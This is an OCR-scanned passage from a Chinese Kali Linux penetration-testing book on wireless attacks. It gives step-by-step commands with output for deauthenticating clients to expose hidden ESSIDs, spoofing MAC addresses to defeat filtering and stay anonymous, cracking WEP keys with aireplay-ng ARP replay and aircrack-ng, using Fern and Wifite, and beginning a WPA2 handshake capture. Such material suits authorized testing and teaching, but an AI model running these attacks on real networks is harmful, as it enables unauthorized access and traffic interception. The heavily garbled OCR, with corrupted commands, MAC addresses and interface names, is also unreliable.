或 者 WEP 或 WPA/WPA2 〈 如 使 用 加 密 ) 。 加 密 (CIPHER) 和 身份 验证 (AUTH) 


在 终端 窗口 的 下 半 部 分 ， 你 将 看 到 站 点 试图 连接 或 已 经 连接 到 无 线 网 络 。 


在 我 们 和 其 他 任何 目标 (潜在 的 ) 网 络 交 互 之 前 ， 必 须 确认 我 们 的 无 线 网 卡 有 数据 包 注 入 的 能 力 。 要 做 到 这 一 点 ， 需 在 终端 


窗口 的 shell 提 示 符 下 ， 运 行 以 下 命令 : 
root@kali:~# aireplay-ng -9 monO 


上 面 的 命令 执行 结果 如 图 8.5 所 示 ，-9 表 示 注 入 测试 。 


root@kali:~# aireplay-ng -9 mond 

17:25:56 Trying broadcast probe requests. 
17:75:58 No Answer... 

17:25:58 Found 1 AP 


17:25:58 Trying directed probe requests... 
17:25:58 00:06:25:9A:A9:C6 - channel: 6 - 


17:25:59 Ping (min/avg/max): 0.283ms/14.610ms/25.907ms Power: 


1/:25:59 30/30: 100% 


17:25:59 Injection is working! 


图 8.5 ”运行 aireplay-ne-9 mon0 命 令 


Kismet 


最 重要 的 无 线 侦察 工具 是 Kismet， 它 是 一 个 802.11 无 线 探测 器 、 嗅 探 器 和 和 入侵 检 测 系 统 。 


Kismet 可 用 于 收集 以 下 信息 : 


-无线 网 络 的 名 称 ，ESSID。 
无线 网 络 的 信道 。 

接 入 点 的 MAC 地 址 ，BSSID。 
无线 客户 端的 MAC 地 址 。 


-30.00 


Kismet 也 可 以 用 来 噢 探 802.11a、802.11b、802.11g 和 802.11n 等 无 线 通 信 流 量 中 的 数据 。 并 支持 用 于 嗅 探 其 他 无 线 协议 的 


插件 。 


在 终端 窗 口 的 命令 提示 符 下 输入 kismet 局 动 Kismet。 


当 Kismet 启 动 后 ， 你 将 面临 一 系列 的 问题 ， 允 许 你 在 其 局 动 过 程 中 对 其 进行 配置 。 用 Yes 回 应 Can you see colors, 


BS 


Kismet is running as root (Kismet 以 root 权 限 运行 ) ， 并 对 Start Kismet Server 选 择 Yes。 在 Kismet 的 局 动 选项 中 ， 不 选中 


Show Console (显示 控制 台 ) ， 因 为 它 会 遮挡 屏幕 。 局 动 Kismet ( 见 图 8.6) 。 
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IMFO: Detected new probe network "«Anys", BSSID 34:23:BA:3C;BBH:289, encryption no, channel 8, 
INFO: Detected new probe network "AwN*, BSSID 48:5D:60:FF:2F:CB, encryption no, channel Ò, 
INFO: Detected new probe network "<Any=", BSSID 4C:EB:42:29:47:4E, oncryption no, channel 8, 
INFO: Detected new probe network "«Any»", BSSID 84:54;26;:83;:29:24, gncryption no, channel 0, 54,80 mbit 
i Detected maw probe network "RoógerstHIE", B55ID 68:28:08:5B:59:85, encryption nó, channel 0, 54.00 mbit 


图 8.6 ”运行 Kali 的 Kismet 
系统 将 提示 你 添加 一 个 捕捉 接口 ， 通 常 我 们 选择 wlan0。 
Kismet 开 始 嗅 探 数据 包 ， 并 收集 位 于 临近 物理 区 域 的 所 有 无 线 系统 信息 、。 
通过 双击 Kismet 选 择 一 个 网 络 ， 你 可 以 在 无 线 网 络 上 看 到 一 些 额外 的 信息 。 
你 也 可 以 深入 研究 以 确定 连接 到 各 种 无 线 网 络 的 特定 客户 端 。 


使 用 Kismet 作 为 友 起 一 些 特定 的 攻击 ( 嗅 探 友 送 的 数据 ) 或 识别 网 络 的 初始 侦察 工具 。 因 为 它 能 被 动 地 收集 连接 数据 ， 所 
以 它 是 一 个 很 好 的 隐 洲 识别 网 络 的 工具 ， 尤 其 是 当 SSID 未 被 公开 传输 时 。 


ESSID 是 标识 一 个 无 线 局 域 网 络 的 唯一 字符 序列 。 通 过 隐藏 ESSID 来 试图 实现 网 络 安全 是 一 个 很 差 的 方法 ; AEN 
是 ，ESSID 可 以 通过 以 下 方式 获得 : 

- 嗅 探 无 线 环境 ， 等 待 客 户 端 关联 到 一 个 网 络 ， 然 后 捕获 该 关联 。 

-主动 取消 鉴定 客户 端 ， 强 制 客户 端 关联 ， 然 后 捕获 该 关联 。 


aircrack 工 具 特 别 适 合 捕捉 需要 取消 ESSID 隐 藏 的 数据 ， 正 如 以 下 步骤 所 示 : 
1. 在 命令 提示 符 下 ， 输 入 以 下 命令 ， 确 认 无 线 在 受 攻击 系统 中 已 经 启动 : 


rootGOkali:-t*t airmon-ng 


2. 使 用 下 面 的 ifconfig 命 令 ， 检 查 可 用 接口 ， 并 确定 你 使 用 的 无 线 系统 的 确切 名 称 。 


root@kali:~# ifconfig 
3. 输 入 以 下 命令 来 启用 你 的 无 线 接口 (你 可 能 需要 把 wlan0 换 成 上 一 步骤 中 ， 确 认可 用 的 无 线 接口 ) : 
root@kali:~# airmon-ng start wlanO 


4. 如 果 你 使 用 ifconfig 再 次 确认 ( 见 图 8.7) ， 你 会 上 友 现 有 一 个 监控 或 mon0 地 址 正在 被 使 用 。 现 在 ， 使 用 airodump 确 认可 
用 的 无 线 网 络 ， 如 下 面 给 出 的 命令 : 


root@kali:-# airodump-ng monO 


CH 18 ][ Elapsed: 48 s ][ 2013-18-23 14:21 


BSSID PWR Beacons ZData, #/s CH MB ENC CIPHER AUTH ESSID 
00:18:39:D5:5D:61 -46 35 39 O 6 54 OPN «length: 9> 
1C:3E:84:26:4B:E1 -80 30 a a 1 54e OPN 

ġ0O:14:30:64:76:81  -B3 17 a a 3 54a. WPA TKIP PSK 

BSSID STATION PWR Rate Lost Frames Probe 

(not associated) 08:080:CA :59:2D:78 B 0-1 G I1 

03:18:39:D5:5D:61 QGG:OE:2b:CF:BC:7C -54 日 -24 19 32 


图 8.7 使 用 ifconfig 确 认可 用 无 线 网 络 


正如 你 所 看 到 的 ， 第 一 个 网 络 的 ESSID 标 识 是 被 认定 为 <length: 9>。 没 有 其 他 的 名 字 或 名 称 被 使 用 。 隐 蕊 的 ESSID 长 度 被 
确定 由 9 个 字符 组 成 ; 然而， 这 个 值 可 能 不 正确 ， 因 为 ESSID 是 隐藏 的 。 真 正 的 ESSID 长 度 实际 上 可 能 短 于 或 超过 9 个 字符 。 


最 重要 的 是 可 能 存在 已 连接 到 该 特定 网 络 的 客户 机 。 如 果 客 户 端 存 企 ,我 们 将 取消 鉴定 客户 端 ， 迫 使 他 们 在 重新 连接 接 入 点 
时 发 送 ESSID。 


重新 运行 airodump， 并 渡 掉 目标 接 入 点 之 外 的 一 切 信息 。 在 这 种 特殊 情况 下 ， 我 们 将 重点 从 隐藏 网 络 的 信道 6 上 收集 数 
据 ， 使 用 以 下 命令 : 


root@kali:-# airodump-ng -c 6 monO0 
执行 该 命令 删除 多 个 无 线 源 的 输出 ， 并 人 允许 攻击 者 把 重点 放 在 目标 ESSID 上 ， 如 图 8.8 所 示 。 


CH 6 ][ Elapsed: 28 s ]| 2813-16-23 14:41 


BSSID PWR RXQ Beacons #Datea, £/s CH MB ENC CIPHER AUTH ESSID 

OO Le 93aS 70a 25076) -53 TOG 288 234 a 5 54 DPA «length: S2 
BSSID STATION PWR Rate Lost Frames Probe 
00:18:38:D5:25D0:51  090B8:DBE:2E:CF: BC: 7C 52 54 -54 a 141 


图 8.8 使 用 aitodump-ng-c 6 mon0 47 - 


执行 airodump 命 令 时 得 到 的 数据 表明 ， 这 有 一 个 站 点 (00: OE: 2E: CF: 8C: 7C) 已 连接 到 BSSID (00: 18: 39: 


D5: 5D: 61) ， 而 这 又 与 隐藏 的 ESSID 相 关联 。 


为 了 截获 正在 传输 的 ESSID， 我 们 必须 创建 一 种 条 件 ， 即 可 以 让 我 们 知道 ， 这 将 在 客 尸 端 和 接 入 点 之 间 连 接 友 送 的 初始 阶 


因此 ,我们 将 针对 客 尸 端 和 接 入 点 友 起 一 个 取消 鉴定 的 攻击 ， 友 送 一 个 可 以 中 断 它们 之 间 的 连接 ， 并 担 使 它们 重新 签 定 的 数 
据 包 流 。 


发 动 攻 击 ， 打 开 一 个 新 的 命令 shell， 并 输入 如 图 8.9 所 示 的 命令 (0 表明 我 们 正在 局 动 一 个 取消 签 定 攻击 ，10 表 明 我 们 将 友 
送 10 个 取消 鉴定 数据 包 ，-a 是 目标 接 入 点 ，c 是 客户 站 的 MAC 地 址 ) 。 


root@kali:~# aireplay-ng -0 10 -a 00:18:39:D5:5D:61 -c 00:0E:2bE:CF:8C:7C mond 
14:52:06 Waiting for beacon frame (BSSID: 00:18:38:D5:5D:61) on channel 6 

14:52:06 Sending 64 directed DeAuth. STMAC: [60:0E:2b:CF:8C:7C] [ 2|61 ACKs] 
14:52:07 Sending 64 directed DeAuth. STMAC: [60:8E:2b:CF:8C:7C] [19|53 ACKs] 
14:52:09 Sending 64 directed DeAuth. STMAC: [6098:0E:2bE:CF:8C:7C] [30|61 ACKs] 
14:52:08 Sending 64 directed DeAutn. SIMAC: [O@:0E:2E:CF:8C:/C] [26/60 ACKs| 


图 8.9 ”使 用 aifteplay-ng-0 10-a-c 命 令 


在 所 有 的 取消 鉴定 数据 包 发 送 之 后 ， 返 回 在 信道 6 中 ， 可 以 监视 网 络 连接 的 原始 窗口 ， 如 图 8.10 所 示 。 现 在 ， 你 将 看 到 清晰 
的 ESSID。 


CH 6 ][ Elapsed: 14 mins ][ 2013-10-23 14:55 


BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 


2 6 OPN 


54 


6815 


7666 


-53 100 


908:18:39:D5:5D:81 


dd hidden 


E840 ”看 到 清晰 的 ESSID 


ESSID 可 以 帮助 攻击 者 ,确认 他 们 正在 关注 的 是 正确 的 网 络 (因为 大 多 数 ESSID 基 于 企业 标识 ) ， 并 使 登录 过 程 更 便利 。 


8.4” 绕 过 MAC 地 址 验证 


开 的 十 六 进 制 形式 的 数字 (0-9 和 字母 A 到 F) 组 成 的 ， 看 起 来 通常 像 这 个 样子 : 00: 50: 56: CO: 00: 01, 

MAC 地 址 ， 通 党 天 联 到 一 个 拥有 网络 能 力 的 网 络 适配器 或 设备 ， 因 为 这 个 原因 ， 它 经 党 被 称 为 物理 地 址 。 

MAC 地 址 的 前 三 对 数字 被 称 为 组 织 唯一 标识 符 (Organizational Unique Identifier) ， 他 们 用 来 确定 生产 或 销售 设备 的 公 
司 。 最 后 三 对 数字 是 特定 于 设备 的 ， 可 以 认为 是 一 个 序列 号 。 


因为 MAC 地 址 是 唯一 的 ， 它 可 以 用 来 将 一 个 用 尸 关 联 到 一 个 特定 的 网 络 ， 尤 其 是 无 线 网 络 。 这 有 两 个 重要 的 合 义 一 一 它 可 
以 用 来 识别 网 络 访问 者 是 一 名 黑客 ， 还 是 一 名 的 合法 网 络 测试 者 ， 它 也 可 以 作为 鉴定 个 体 身份 ， 并 授权 他 们 访问 网 络 权限 的 工 
E 


-— 0 


在 渗透 测试 的 过 程 中 ,测试 人 员 可 能 更 喜欢 匿名 访问 网 络 。 支 持 匿 名 信息 的 方法 是 改变 攻击 系统 的 MAC 地 址 。 


这 可 以 使 用 ifconfig 命 令 手动 完成 。 确 定 现 有 的 MAC 地 址 ， 运 行 命令 解释 器 中 的 以 下 命令 : 
root@kali:~# ifconfig wlan0 down 

root@kali:~# ifconfig wlan0 | grep HW 

要 手动 更 改 IP 地 址 ， 使 用 下 面 的 命令 : 


root@kali:-~# ifconfig wlan0 hw ether 38:33:15:xx:xx:xx 
root@kali:~# ifconfig wlanO up 
蔡 损 不 同 的 十 入 进 制 对 的 “xx” 表达 式 。 这 个 命令 将 允许 我 们 更 改 攻击 系统 的 MAC 地 址 ， 更 改 为 受害 者 网 络 接受 的 MAC 地 
址 。 攻 击 者 必须 确保 这 个 MAC 地 址 并 没有 在 网 络 上 使 用 ， 否 则 ， 如 果 网 络 被 监控 ， 重 复 的 MAC 地 址 可 能 会 触及 和 警报。 


Soa 改变 MAC 地 址 之 前 ， 无 线 接口 必须 被 关闭 。 
Kali 还 允许 使 用 一 个 自动 化 工具 macchanger。 要 改变 攻击 者 的 MAC 地 址 ， 为 同一 供应 商 生 产 的 产品 的 MAC 地 址 ， 可 从 终 


瑞 窗 口中 使 用 如 下 macchanger 命 令 : 
root@kali:~# macchanger wlan -e 


要 改变 现 有 的 MAC 地 址 为 一 个 完全 随机 的 MAC 地 址 ， 可 使 用 以 下 命令 ， 运 行 该 命令 后 的 屏幕 截图 如 图 8.11 所 示 : 
root@kali:~# macchanger wlanO -r 
root@kali:-# ifconfig wlan® down 
rootükali:-£ macchanger wlanO -r 
Permanent MAC: 00:c0:ca:59:2d:/B (Alfa, Inc.) 
Current MAC: 00:c0:ca:58:2d*:/8 (Alfa, Inc.) 
Now MAC: c6://:298:55:a5:4c (unknown) 

图 8.11 运行 macchanget wlanO-r 
有 些 攻击 者 在 测试 过 程 中 ， 使 用 自动 化 脚本 频繁 地 改变 他 们 的 MAC 地 址 ， 以 实现 匿名 化 他 们 的 攻击 活动 。 


许多 组 织 ， 尤 其 是 学 院 和 大 学 等 大 型 学 术 团 体 ， 使 用 MAC 地 址 过 滤 来 控制 谁 可 以 访问 他 们 的 无 线 网 络 资源 。MAC 地 址 过 渡 
使 用 网 卡 上 唯一 的 MAC 地 址 来 控制 对 网 络 资源 的 访问 ; 在 一 个 典型 的 配置 中 ， 该 组织 维护 一 个 允许 访问 网 络 的 MAC 地 址 日 名 单 
(whitelist) 。 如 果 传 入 的 MAC 地 址 不 在 已 批准 的 访问 列表 中 ， 将 限制 其 连接 到 该 网 络 。 


不 幸 的 是 ，MAC 地 址 信息 以 明文 传输 。 攻 击 者 可 以 使 用 airodump 收 集 接收 到 的 MAC 地 址 列表 ， 然 后 手动 改变 他 们 的 MAC 
地 址 为 目标 网 络 接受 的 MAC 地 址 。 因 此 ， 这 种 类 型 的 过 滤 几 乎 没有 为 无 线 网 络 提供 任何 实质 的 保护 。 


一 个 最 新 水 平 的 无 线 保 护 是 由 加 密 提供 的 。 


8.5 ”破解 WEP 加 密 


无 线 等 效 保密 协议 (Wireless Equivalent Privacy, WEP) 起 源 于 1999 年 ， 其 针对 802.11 无 线 网 络 ， 提 供 一 定 程度 保密 性 
的 工具 ， 这 瓯 相 当 于 是 一 个 可 以 和 有 线 网 络 等 价 的 设备 。 在 对 其 实施 加 密 时 ， 多 个 漏洞 被 快速 友 现 ， 到 2004 年 ， 它 被 WiF 访问 
保护 (WiFi Protected Access，WPA) 协议 所 取代 。 


C eee | S " | 
WEP 今天 仍 在 使 用 ， 尤 其 是 无 法 支持 新 无 线路 由 器 所 需 资 源 的 较 老 的 网 络 。 在 最 近 的 一 次 主要 城市 中 心 无 线 调查 显示 : 几乎 25% 的 加 密 无 
线 网 络 仍 在 继续 使 用 WEP。 许 多 这 样 的 网 络 均 与 金融 机 构 关联 。 


WEP 的 主要 缺陷 之 一 ， 是 在 重用 初始 化 向 量 (Initialization Vector, IV) 中 确定 的 。WEP 依 赖 于 RC4 加 密 算 法 ， 这 是 一 种 
流 密 码 一 一 相同 的 加 密 密 钥 不 能 重复 使 用 。|V 用 于 防 沁 密 钥 的 重用 ， 通 过 引入 随机 元 素来 加 密 数据 。 不 笠 的 是 ，24 位 的 |V 大 短 
而 不 能 防止 密 钥 重 复 ;， 此 外 ， 在 5000 数 据 包 被 传输 之 后 ， 有 50% 的 概率 会 重复 IV。 


攻击 者 可 以 穷 听 或 截取 WEP 加 密 数 据 流 。 根 据 用 于 备查 的 拦截 数据 包 的 数量 ， 密 钥 可 以 被 迅速 恢复 。 在 实践 中 ， 大 多 数 
WEP 密 钥 可 以 在 三 分 钟 内 被 获取 或 破解 。 

要 实施 WEP 破 解 工 作 ， 你 还 需要 了 解 目 标的 以 下 信息 : 

:无 线 网 络 的 名 称 或 ESSID。 


-MAC 地 址 的 访问 点 ，BSSID。 
-使 用 的 无 线 信道 。 
无线 客户 机 的 MAC 地 址 。 


针对 WEP 最 常见 的 攻击 ， 可 以 通过 执行 以 下 步骤 实 现 : 

1. 首 先 ， 使 用 以 下 命令 确定 可 用 的 无 线 网 络 接口 : 

root@kali:~# alrmon-ng 

2. 停 止 改变 该 接口 的 MAC 地 址 为 一 个 已 经 与 目标 网 络 关 联 的 现 有 客户 端的 MAC 地 址 。 你 还 可 以 使 用 macchanger 实 现 这 一 
步 。 当 MAC 地 址 已 更 改 时 ， 重 新 启用 airmon-ng。 使 用 以 下 命令 来 完成 这 些 步骤 : 


root@kali:~# airmon-ng stop 
root@kali:~# ifconfig wlanO down 
root@kali:~# ifconfig wlanO hw ether (mac address) 


root@kali:~# airmon-ng start wlan0O 


使 用 已 知 的 并 且 被 认可 的 MAC 地 址 ， 可 以 简化 攻击 。 然 而 ， 事实 并 非 总 是 如 此 。 这 种 攻击 假设 你 并 不 知道 该 MAC 地 址 。 相 
Be, 我们 将 在 网 络 上 创建 一 个 假 的 关联。 


3. 使 用 下 面 的 airodump 命 令 来 定位 目标 无 线 网 络 : 


root@kali:~# airodump-ng wlanO 


当 airodump 定 位 目标 时 ， 可 以 按 Ctrl+C 停 止 搜索 。 复 制 BSSID 中 的 MAC 地 址 ， 并 记录 信道 。 从 图 8.12 的 示例 可 以 看 出 ， 目 
标 网 络 dd_wep 正 在 信道 6 上 以 11MB 的 速度 运行 。 


B55ID PWR Beacons #Vata, #/s Ch MB ENC CIPHER AUTH ESSID 


7E:BA:DB:A2:22:E9 -1 24 g OQ 10 54 OPN 

02:2bE:FE:3F:43:3B -l /3 g 9 10 11 OPN 

80:06:25:9A:A9:C6 -24 6G 53 QO 5 11 WEP WEP dd wep 
09:1A:30:64:/6:80 -5l /2 ] () 3 54e. OPN 

60:1A:30:64:76:81 -51 94 0 6 3 54e. WPA TKIP PSK i 


图 8.12 使 用 aitrodump 命 令 


4. 末 用 airodump-ng 嗅 探 无 线 流 量 ， 并 使 用 以 下 命令 收集 IV， 其 中 --bssid 用 来 选择 目标 BSSID、-c 指 示 使 用 的 信道 ， 而 -w 
用 来 给 出 输出 文件 的 名 字 (wep out) 。 


root@kali:~# airodump-ng --bssid 00:06:25:9A:A9:C6 -c 6 -w 
wep out wlanO 


5. 现 在 我 们 需要 增加 传输 的 |V 数 据 包 的 数量 。 重 新 打开 一 个 新 的 终端 窗口 (不 要 关闭 第 一 个 ) ， 输 入 以 下 命令 伪造 目标 无 线 
接 入 点 的 可 验证 身份 : 


root@kali:~# aireplay-ng -1 0 -a 00:06:25:9A:A9:C6 -h 
00:11:22:33:44:55 -e dd wep wlanO 


，-1 表 示 一 个 假 身 份 证 明 ， 而 0 是 重新 关联 的 时 间 ， 单 位 为 秒 (设置 为 0 可 以 提醒 防御 者 ， 因 此 攻击 者 可 能 会 把 它 设置 
为 30 或 更 高 ) 。 


6. 使 用 假 的 身份 证 明 ， 我 们 将 产生 来 自 受 信任 的 MAC 地 址 的 流量 ， 并 将 其 路 由 到 目标 无 线 接 入 点 。 


root@kali:-# aireplay-ng -3 -b 00:06:25:9A:A9:C6 -h 
00:11:22:33:44:55 wlanO 


这 种 攻击 即 为 ARP 注 入 或 ARP 重 定向 攻击 。 通 常情 况 下 ， 目 标 接 入 点 将 重播 ARP 数 据 包 ， 并 且 每 次 生成 一 个 新 的 IV; 目 然 ， 
这 是 一 个 快速 生成 必要 IV 的 万 法 。 


前 面 命令 的 执行 结果 ， 如 图 8.13 所 示 。 


root@kali:-# aireplay-ng -3 -b 00:06:25:9A:A9:C6 -h 00:11:22:33:44:55 wLanO 
15:58:06 Waiting for beacon frame (BSSID: 00:06:25:9A:A49:C6) on channel 6 
saving ARP requests in replay arp-1215-15500060.cap 

You should also start airodump-ng to capture replies. 

Read 2636 packets (got 23 ARP requests and 117 ACKs), sent 130 packets...(494 pp 
Read 2/86 packets (got 120 ARP requests and 159 ACKs), sent 181 packets...(498 pi 
Read 2950 packets (got 223 ARP requests and 209 ACKs), sent 231 packets...(498 pi 
Read 3113 packets (got 32/ ARP requests and 256 ACKs), sent 282 packets...(499 p 


图 8.13 ”使 用 aireplay-ng-3-b 命 令 


7. 在 ARP 注 入 持续 的 过 程 中 生成 一 些 额外 的 数据 包 。 打 开 另 外 一 个 终端 窗口 ， 并 通过 输入 如 下 命令 ， 启 用 一 个 交互 式 数 据 包 
重 放 攻击 : 


root@kali:~# aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF 
- b (mac address) -h (mac address) wlanO 


这 里 ，-2 表 示 我 们 正在 使 用 交互 式 重 放 攻 击 ，-p 0841 为 数据 包 设 置 帧 控制 字段 ， 使 它 看 起 来 好 像 来 自 一 个 无 线 客 户 端 ，-< 
FF: FF: FF: FF: FF: FF 设置 目的 地 址 (在 这 种 情况 下 ，FF 表 示 将 数据 包 友 送 到 网 络 上 的 所 有 主机 ) ，-b 是 BSSID 的 MAC 地 
址 ， 而 -h 是 正在 传输 的 与 测试 者 MAC 地 址 相 匹 配 的 数据 包 MAC 地 址 。 


前 面 命令 的 执行 结果 ， 如 图 8.14 所 示 。 


rootükali:-£ aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:06:25:9A:A9:C6 -h 
00:11:22:33:44:55 wlanO 


Size: 68, FromDS: 0, ToDS: 1 (WEP) 


BSSID = 60:606:275:9A:A9:C6 

Dest. MAC = FF:FF:FFIFF:FF FF 

Source MAC = (6:11:27:33:44:55 
GOx0000: 0841 3a01 GO0806 259a aSc6 08011 2233 4455 .A:...%.....°3DU 
0OxOGl80: ffff ffff ffff 863d af52 0600 b675 7eeB . ....... =.R...U~. 


0x0020: O8ba 5846 Gd2e 5571 d/a6 /b3/ 5865 Bb01 ..XF . .Uq. . (7Xe.. 
0x0030: bc59 f2a88 fc22 20c6 3Bd5 a/ca Ofd6 a246  .Y..." .8 
0x0040: e66c 12e3 Es 


Use this packet ? 
图 8.14  4& JfJaireplay-ng-2-p 4» 4- 
8. 另 一 种 使 网 络 忙碌 的 万 法 是 在 攻击 的 系统 上 打开 多 个 命令 脚本 ,并 输入 如 下 命令 用 目标 的 IP 地 址 替代 原 IP 地 址 : 
root@kali:~# ping -T -L 6500 (IP address) 
9. 收 集 和 保存 足够 的 数据 包 之 后 ， 使 用 下 面 的 aircrack-ng 命 令 破 解 WEP 密 钥 ， 其 中 -a 1 集中 攻击 模式 为 静态 WEP，-b 是 
BSSID， 而 dd_wep.cap 是 包含 截获 IV 的 截获 文件 。 


root@kali:~# aircrack-ng -a 1 -b 00:06:25:9A:A9:C6 -n 64 
dd wep.cap 


Aircrack-ng 1.2 betal 


[00:00:01] Tested 1554811 keys (got 40/8 IVs) 


KB depth — byte(vote) 
0  62/ bb  EC(4864) O1(4608) 07(4608) 19(4608) IF(4608] 
l 16/ 1 A8 (5888) 08(5632) 10(5632) 56(5632) 92(5632) 
2 14/ 34  53(5888) O2(5632) 26(5632) 2bE(5632) 56(5632) 
3 60/ 3  EF(4864) 03(4608) 06(4608) OB(46808) 15( 4608} 
1 8/ 30 33(6400) 6F(5888) /6(5868) 9B(5888) B4(5888) 


KEY FOUND! [ OB:BZ:D8:28:82 | 
Decrypted correctly: 100% 


图 8.15 4% Flaircrack -ng -a 1 -b 命 令 


如 图 8.15 所 示 ， 该 攻击 是 成 功 的 且 密 码 均 被 确认 。 (虽然 它 看 起 来 是 一 个 十 入 进 制 数 ， 但 你 可 以 简单 地 输入 它 ， 并 登录 到 
WEP 了 网 络 上 。 ) 


虽然 这 次 演示 集中 在 64 位 的 密 钥 上 ,一旦 你 从 接 入 点 收获 了 IV， 那 么 长 密 钥 在 破解 过 程 中 并 不 一 定 会 花费 更 多 时 间 |。 


该 工具 的 aircrack-ng 组 件 是 “黄金 标准 ”， 其 提供 了 最 可 靠 和 有 效 的 接 入 方法 。 然 而 ，Kali 附 带 的 一 些 其 他 工具 也 可 以 帮 
助 你 破解 加 密 的 无 线 网 络 。 


其 中 之 一 是 Fern WiFi Cracker， 它 是 集成 了 aircrack-ng 的 Python 图 形 用 户 界面 。 它 可 以 自动 扫描 无 线 网 络 ， 并 识别 
WEP、WPA 和 WPA2 网 络 。 一 旦 网 络 被 识别 ， 攻 击 者 可 以 利用 几 个 方面 的 特性 来 攻击 ， 其 中 包括 以 下 几 点 : 


使 用 各 种 攻击 实现 WEP 破 解 ， 包 括 分 片 、 切 片 、Caffe Latte、Hirte、ARP 重 定向 ， 或 者 WPS 攻 击 。 
-使 用 字典 ， 或 基于 WPS 的 攻击 ， 来 破解 WPA 和 WPA2。 

成 功 破解 之 后 ， 上 自动 把 密 钥 保存 在 一 个 数据 库 中 。 

内 部 中 间 人 引擎 文 持 会 话 支持 。 

暴力 攻击 ， 可 以 攻击 HTTP、HTTPS、Telnet 和 FTP。 


Fern 的 界面 很 干 兆 ， 它 可 以 指导 用 己 选 择 接口 和 扫 摘 接 入 点 。 它 将 报告 WEP 和 WPA/WPA2 的 接 入 点 ; 从 这 时 开始 ， 即 可 通 
过 点 击 适当 的 按钮 来 友 起 攻击 。 最 初 的 Fern 局 动 屏幕 如 图 8.16 所 示 。 


Fern WIFI Cracker 


Select irrte rfmce 


Select an interface card 


Scan for Access ports 


Detection Status 


Detection Status 


Fern WIFI Cracker 1.9 


Unrwmbie te check for upciates.nitwork timeout 


Key Database No Key Entries 


Python Versio 2.7.3 default 
Aircreck Version; Aircrack-ng 1,2 betal 


Gt Versian: 4.9.3 


About Fern WIFI Cracker 
GUI suite for wireless encryption strength testing of 802.11 wireless erxryption starcia rd scorsa ports 


Written by Saviour Errrmanruel Geko Report Bugs at: savicbayz (B roce trmall com 


图 8.16 ” ”Fern 启动 屏幕 


尽管 Fern 是 一 个 很 好 的 工具 ,但 大 多 数 测 试 人 员 并 不 完全 依赖 它 一 一 如 果 识 别 密 钥 或 者 获得 网 络 接 入 失败 ， 失 败 的 原因 将 
隐藏 在 图 形 用 户 界 面 之 后 ， 这 将 使 故障 诊断 变 得 很 困难 。 


一 个 类 似 的 应 用 程序 是 Wifite 无 线 审计 师 (Wifite wireless auditor) ， 其 提出 了 一 个 基于 文本 的 界面 来 支持 测试 。 它 已 经 
被 证 明 在 测试 领域 是 非常 有 效 的 ， 它 的 特点 和 优势 包括 以 下 几 个 方面 : 

Wifite 支 持 通 过 在 攻击 之 前 改变 攻击 者 的 MAC 地 址 为 随机 的 MAC 地 址 来 实现 匿名 ， 然 后 ， 当 所 有 的 攻击 完成 之 后 再 把 MAC 地 址 改 回来 。 

.通过 信号 强度 对 目标 进行 排序 〈 用 dB 表示 ) ， 并 优先 破解 最 近 的 接 入 点 。 

-自动 取消 鉴定 隐藏 在 网 络 中 的 客户 端 ， 用 于 显示 SSID。 

支持 多 种 攻击 类 型 。 


如 图 8.17 中 显示 的 示例 ， 选 择 攻 击 一 个 单一 的 目标 qdd_wep。 不 需要 其 他 与 该 应 用 程序 的 交互 ， 它 目 己 完 成 了 所 有 破解 ， 并 
把 破解 的 密 钥 保存 到 数据 库 中 。 


里 然 过 时 WEP 的 脆弱 性 众所周知 ， 并 被 Kali 的 一 些 基本 工具 所 证 明 ， 但 强 WPA 加 密 协 议 该 如 何 抵制 攻击 ? 
[+] 1 target selected. 


preparing attack "dd wep" (00:06:25:9A:A9:C6) 
attempting fake authentication (1/5)... success! 
attacking ‘dd wep" via arp-replay attack 

started cracking (over 10000 ivs) 

captured 15358 ivs (0 /00 iv/sec 


[8:08:41] cracked dd wep (00:06:25:9A:A9:C6)! key: "OBB/DB2882" 


] attack completed: 


171 WEP attacks succeeded 
cracked dd wep (00:05:25:9A:A9:C6], Key: "OBB/DB2882 


图 8.17 启动 Wifite 攻 击 


8.6 攻击 WPA 和 WPA2 


无 线 访问 保护 (WiFi Protected Access, WPA) 和 无 线 访问 保护 2 (WiFi Protected Access 2, WPA2) 是 用 于 解决 WEP 
安全 缺陷 的 无 线 安全 协议 。 因 为 WPA 协 议 可 以 为 每 一 个 数据 包 动 态 生 成 新 的 密 铀 ， 阻 止 那些 导致 无 线 保 护 访 问 失 败 的 统计 分 
析 。 然 而 ， 它 们 仍然 很 容易 受到 一 些 攻击 技术 的 攻击 。 


WPA 和 WPA2 经 常 使 用 预 共 享 密 钥 (pre-shared key, PSK) 进行 部 署 ， 来 提供 访问 点 和 无 线 客 尸 端 之 间 的 安全 通信 。PSK 
是 一 个 至 少 13 个 字符 长 的 随机 密码 ; 如 果 不 是 13 字 符 长 ， 对 一 个 已 知 的 字典 ， 使 用 暴力 攻击 来 确定 一 个 PSK 是 可 能 的 。 这 是 最 
常见 的 攻击 。 (注意 ， 如 果 是 在 Enterprise 模 式 中 进行 配置 ， 其 可 以 使 用 RADIUS 认 证 服务 器 提供 身份 认证 ， 从 我 们 的 角度 来 
看 ，WPA 是 “ 牢 不 可 破 ” 的 ! ) 


8.6.1 暴力 攻击 曝光 


不 像 WEP， 可 以 被 对 大 量 数 据 包 的 统计 分 析 所 破解 ，WPA 解 密 需 要 攻击 者 创建 特定 的 、 已 知 详细 信息 的 数据 包 类 型 ， 如 接 
入 后 和 客户 端 之 间 的 信号 交换 信息 。 


攻击 一 个 WPA 传 输 ， 应 该 执行 以 下 步骤 : 
1. 启 动 无 线 适 配器 ， 并 使 用 ifconfig 命 令 来 确保 已 创建 监控 界面 。 
2. 使 用 airodump-ng-wlan0 识 别 目标 网 络 。 


3. 开 始 使 用 以 下 命令 捕获 目标 接 入 点 和 客 尸 端 之 间 的 流量 : 


root@kali:~# airodump-ng --bssid 28:10:7B:61:20:32 -c 11 


--showack -w dd wpa2 wlan0 


ez 


设置 -c 监 控 特 定 信道 ，--showack 标 志 用 来 确保 客 尸 端 计 算 机 认可 你 的 请 求 ， 即 从 无 线 接 入 点 取消 上 鉴定; 而 -w 把 输出 写 入 
一 个 用 于 后 续 字 上 典 攻 击 的 文件 中 。 这 种 攻击 的 典型 输出 如 图 8.18 所 示 。 


CH 11 ][ Elapsed: 1 min ][ 2013-12-15 23:24 


BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 
